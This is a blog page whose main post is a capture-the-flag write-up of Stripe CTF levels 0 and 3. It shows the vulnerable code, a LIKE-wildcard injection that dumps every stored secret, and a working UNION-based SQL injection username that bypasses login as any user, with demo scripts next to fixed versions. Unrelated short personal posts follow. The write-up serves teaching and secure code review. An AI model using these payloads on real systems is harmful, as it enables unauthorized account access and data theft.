salt - Dave's Blog

Stripe CTF - SQL injections (Levels 0 & 3)

2012 Sep 5, 9:10

Level 0 and level 3 of Stripe's web security CTF both fell to injection into a SQL query; the solutions are described below.

Level 0

Code

app.get('/*', function(req, res) {
  var namespace = req.param('namespace');

  if (namespace) {
    // namespace is bound to the ? placeholder, then concatenated (in SQL) into the LIKE pattern
    var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';
    db.all(query, namespace, function(err, secrets) {
      if (err) throw err;
      res.json(secrets); // completion: the page's excerpt stops at db.all; every matching row goes back to the caller
    });
  }
});

Issue

The namespace parameter is bound to the ? placeholder, so it cannot alter the statement itself, but the bound value is then concatenated (inside SQL) into a LIKE pattern, and nothing validates the parameter or escapes LIKE's metacharacters. Sending '%' as the namespace turns the pattern into '%.%', which matches every secret in the table; '_' (match any single character) can be used the same way to probe key lengths.

Notes

The code-review red flag is user input flowing into the query text, here into the LIKE pattern: the ? placeholder protects the structure of the query, not the meaning of the pattern. Later levels were harder to exploit: they constructed queries through an object-based API rather than strings, ran a single statement that returned only a single row, and didn't dump the query results straight back to the caller.
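The level 0 problem reproduced against an in-memory SQLite table, as an added example (not code from the CTF or from this post): the vulnerable lookup beside one that escapes LIKE wildcards and declares the escape character. The secrets table, its rows and the function names are constructed for illustration; the CTF's query wrote the suffix as ".%" in double quotes, which SQLite accepts as a string literal when no such column exists, and the example uses single quotes for the same thing.

```python
"""Added example: LIKE-wildcard injection (Stripe CTF level 0) and its fix.
Table, rows and names are constructed for illustration."""
import sqlite3


def make_db():
    # Constructed sample data: keys are "<namespace>.<name>", as in the CTF.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE secrets (key TEXT PRIMARY KEY, value TEXT)")
    conn.executemany(
        "INSERT INTO secrets VALUES (?, ?)",
        [
            ("alice.password", "hunter2"),
            ("alice.api_token", "tok-a1"),
            ("bob.password", "swordfish"),
            ("level02-password-holder.secret", "not-the-real-flag"),
        ],
    )
    return conn


def lookup_vulnerable(conn, namespace):
    """Same shape as the CTF query: namespace is a bound parameter, so it cannot
    change the statement, but it still becomes the LIKE pattern, wildcards and all."""
    query = "SELECT key, value FROM secrets WHERE key LIKE ? || '.%'"
    return conn.execute(query, (namespace,)).fetchall()


def like_escape(s, esc="\\"):
    """Escape LIKE metacharacters (and the escape character itself) so the
    caller's input is matched literally."""
    return s.replace(esc, esc + esc).replace("%", esc + "%").replace("_", esc + "_")


def lookup_hardened(conn, namespace):
    """Escape the user-supplied part and tell SQLite which escape character was
    used; the '.%' suffix we append remains a real wildcard."""
    query = "SELECT key, value FROM secrets WHERE key LIKE ? || '.%' ESCAPE '\\'"
    return conn.execute(query, (like_escape(namespace),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, namespace '%':", lookup_vulnerable(db, "%"))   # all four rows
    print("vulnerable, namespace '___':", lookup_vulnerable(db, "___"))  # any 3-char namespace
    print("hardened, namespace '%':", lookup_hardened(db, "%"))       # nothing
    print("hardened, namespace 'alice':", lookup_hardened(db, "alice"))  # alice's two keys
```

An allowlist on the parameter (for example, only letters, digits and hyphens) is an equally good fix and simpler to review; escaping is the right choice when the legitimate input may itself contain '%' or '_'.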

Level 3

Code

import hashlib
import os
import sqlite3

import flask

app = flask.Flask(__name__)
data_dir = os.environ.get('DATA_DIR', '.')  # location of users.db; assumed, the page does not show it

@app.route('/login', methods=['POST'])
def login():
    username = flask.request.form.get('username')
    password = flask.request.form.get('password')

    if not username:
        return "Must provide username\n"

    if not password:
        return "Must provide password\n"

    conn = sqlite3.connect(os.path.join(data_dir, 'users.db'))
    cursor = conn.cursor()

    # Vulnerable: username is formatted straight into the SQL text
    query = """SELECT id, password_hash, salt FROM users
               WHERE username = '{0}' LIMIT 1""".format(username)
    cursor.execute(query)

    res = cursor.fetchone()
    if not res:
        return "There's no such user {0}!\n".format(username)
    user_id, password_hash, salt = res

    # Python 2 str concatenation, as in the CTF (Python 3 would need .encode())
    calculated_hash = hashlib.sha256(password + salt)
    if calculated_hash.hexdigest() != password_hash:
        return "That's not the password for {0}!\n".format(username)
    # the successful-login path is not shown in the page's excerpt

Issue

There's little input validation on username before it is used to construct a SQL query, and no encoding is applied when building the query string that, given a username, returns the stored password hash and salt. Accordingly one can make username part of a SQL command: close the original string literal, make the original SELECT return nothing, and append a UNION with a second SELECT that returns literal values of one's own choosing for the hash and salt. Since fetchone() takes only the first row, the injected row is the one that gets checked. The query template is shown first, then the submitted username, then the resulting query (the original post colour-coded the two parts):

Query template:

SELECT id, password_hash, salt FROM users WHERE username = '{0}' LIMIT 1

Username submitted (the injected SQL):

doesntexist' UNION SELECT id, ('5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8') AS password_hash, ('word') AS salt FROM users WHERE username = 'bob

Resulting query:

SELECT id, password_hash, salt FROM users WHERE username = 'doesntexist' UNION SELECT id, ('5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8') AS password_hash, ('word') AS salt FROM users WHERE username = 'bob' LIMIT 1

In the above I've supplied my own salt and hash such that my salt (word) appended to my password (pass) hashes to the value I provided: sha256('pass' + 'word') is sha256('password'), which is the hash above. Accordingly, by submitting that long and interesting-looking username with the password 'pass', I am logged in with bob's id, and swapping bob for any other username logs me in as that user.

Notes

Code review red flag is again using strings to query the database. This level was made more difficult by an API that returns only a single row (fetchone) and by the execute method, which runs only one statement, so appending a second command after a semicolon would not work; a UNION inside the one statement sidesteps both. I was forced (as a SQL noob) to learn the syntax of SELECT in order to figure out UNION and how to return my own literal values.
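The level 3 login reproduced against an in-memory SQLite users table, as an added example (not the CTF's or this post's code): the handler in its vulnerable string-formatting form beside a parameterized one, with the UNION payload from above fed to both. The users, their real passwords, salts and ids are constructed for illustration; the function names are mine.

```python
"""Added example: UNION injection against the Stripe CTF level 3 login and its fix.
Users, passwords, salts and ids are constructed for illustration."""
import hashlib
import hmac
import sqlite3

# sha256("password"): the hash from the post, equal to sha256("pass" + "word")
PAYLOAD_HASH = "5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8"
# The username submitted in the post: closes the literal, empties the first
# SELECT, and UNIONs in bob's id with an attacker-chosen hash and salt.
INJECTED_USERNAME = (
    "doesntexist' UNION SELECT id, ('" + PAYLOAD_HASH + "') AS password_hash, "
    "('word') AS salt FROM users WHERE username = 'bob"
)


def sha256_hex(password, salt):
    """Same construction as the CTF: sha256(password + salt), as bytes for Python 3."""
    return hashlib.sha256((password + salt).encode()).hexdigest()


def make_db():
    # Constructed sample users; real credentials are unknown to the attacker.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, "
                 "password_hash TEXT, salt TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', ?, 'xk9')",
                 (sha256_hex("correct horse", "xk9"),))
    conn.execute("INSERT INTO users VALUES (2, 'bob', ?, 'q7z')",
                 (sha256_hex("swordfish", "q7z"),))
    return conn


def login_vulnerable(conn, username, password):
    """Mirrors the CTF handler: username is formatted into the SQL text.
    Returns the authenticated user id, or None."""
    query = """SELECT id, password_hash, salt FROM users
               WHERE username = '{0}' LIMIT 1""".format(username)
    res = conn.execute(query).fetchone()
    if not res:
        return None
    user_id, password_hash, salt = res
    if sha256_hex(password, salt) != password_hash:
        return None
    return user_id


def login_fixed(conn, username, password):
    """Bound parameter: the username can only ever be compared as a value,
    so the payload is looked up literally and matches nobody."""
    query = "SELECT id, password_hash, salt FROM users WHERE username = ? LIMIT 1"
    res = conn.execute(query, (username,)).fetchone()
    if not res:
        return None
    user_id, password_hash, salt = res
    if not hmac.compare_digest(sha256_hex(password, salt), password_hash):
        return None
    return user_id


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload + 'pass':", login_vulnerable(db, INJECTED_USERNAME, "pass"))  # 2 (bob)
    print("fixed, payload + 'pass':", login_fixed(db, INJECTED_USERNAME, "pass"))            # None
    print("fixed, bob's real password:", login_fixed(db, "bob", "swordfish"))               # 2
```

The fixed version also compares hashes with hmac.compare_digest, which is independent of the injection but is what a review would ask for in the same line.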

Tags: security, sql, sql-injection, technical, web-security

Bitter Chocolate Beer Bottle

2010 Jul 16, 6:43

Tags: bear, beer, bottle, salt, wa, issaquah

I Love Local Commercials - Sponsored by MicroBilt Corporation

2009 Nov 5, 2:07

Two guys sponsored by MicroBilt to travel around the country and make totally awesome commercials for local companies. Includes such gems as Salt Lake Community Barbering & Cosmetology School: "Your hairdo is only limited by your imagination. And how far along we are in the semester.", as well as Cullman Liquidation: "They're used. Some of them have stains. We cover that up."

Tags: via:boingboing, video, advertising, commercial, tv, monthly

Birthday Weekend

2008 Sep 4, 11:30

Photo: the Seattle skyline in the distance over water.

This past weekend Sarah and I went to Salty's on Alki. I had never been down to the Alki area so that was fun and I took a few photos while we were there. It turns out they were the last few photos I'll be taking with that camera, as it turned itself on in my pocket and the lens extension mechanism broke for the innermost lens. So now I'm looking for a new camera, preferably one that has a lock mechanism so I can't accidentally turn it on in my pocket. The dinner was good and Salty's has a great view. On an unrelated note, the next day we went to an Audi dealership and test-drove the new 2009 A4, which was fun. I'm happy with my car but Sarah's feeling antsy.

Tags: alki, rambling, camera, weekend, birthday, nontechnical

Weekend Humor

2007 Mar 13, 8:16

Over the weekend I went with Jon and Sarah to see Zach Galifianakis perform at The Moore; he was awesome of course. I hadn't been to The Moore before but it was very cool. The space is very vertical, with two levels of balconies making it seem small in the other dimensions. We were on the middle level, so when Zach climbed off the stage to talk to the audience we couldn't see him.

Before the show we ate at The Steelhead Diner. I enjoyed my chicken sandwich, but the place seemed a little full of itself, with salt and pepper that had been infused with this and that. At any rate it had a nice atmosphere and good food, which I suppose is the point.

The opening act for Zach was another comedian whose name I don't recall. He was pretty funny but seemed to do just a tad too much pandering to the Seattle audience. "The administration should do something different than what they're doing currently!" *Audience cheers* is sort of equivalent to "It's great to be here in... Seattle!" *Audience cheers*.

Tags: personal, seattle, nontechnical

Creative Commons License: Some rights reserved.